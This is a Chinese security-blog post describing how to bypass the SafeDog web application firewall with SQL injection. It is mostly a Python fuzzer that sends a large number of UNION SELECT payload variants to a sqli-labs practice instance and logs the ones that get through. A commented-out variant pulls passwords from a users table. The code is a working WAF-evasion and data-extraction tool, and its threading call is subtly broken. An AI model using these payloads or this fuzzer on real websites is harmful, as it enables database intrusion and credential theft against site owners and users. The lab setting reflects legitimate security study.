fuzz方法注入绕过安全狗

  • 内容
  • 相关

以sqli lab 第六关为测试环境 

成功bypass

 注释里的payload

可以成功跑出带表名列名的信息

#encoding = utf8
import requests
from queue import Queue
import threading

fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
Fuzz=fuzz_ch+fuzz_sz+fuzz_zs
class fuzz:
    def __init__(self,root,ThreadNum=5):
        self.root="http://192.168.1.109/sqli/Less-5/?id=1"
        self.ThreadNum=5
        self.headers = {
             'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) 

AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',
             'Referer': 'http://www.camel.com',
             'Cookie': 'whoami=digo8',
             }
        self.task =Queue()
        for a in Fuzz:
            for b in Fuzz:
                for c in Fuzz:
                    for d in Fuzz:
                        exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,3 --+"
                        '''exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password 

/*!from "+a+b+c+d+"users*/--+"'''
                        self.task.put(exp)
        self.s_list = []
    
    def visit(self,url):
        try:
            r = requests.get(url,headers=self.headers)
            ret=r.text
        except:
            print ("Fail to connect...")
            ret=""
        return ret

    def test_url(self):
        while not self.task.empty():
            url = self.task.get()
            ret = self.visit(url)
            if "Dhakkan" in ret and not "error" in ret :
                self.s_list.append(url)
                print (url)
    
    def work(self):
        threads = []
        for i in range(self.ThreadNum):
            t = threading.Thread(target=self.test_url())
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
obj=fuzz("http://192.168.1.109/sqli/Less-5/?id=1")
obj.work()

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[已提交百度] | [360已收录] | [搜狗已收录]

本文链接:fuzz方法注入绕过安全狗 - https://www.0dayhack.com/post-785.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

00:00 / 00:00
顺序播放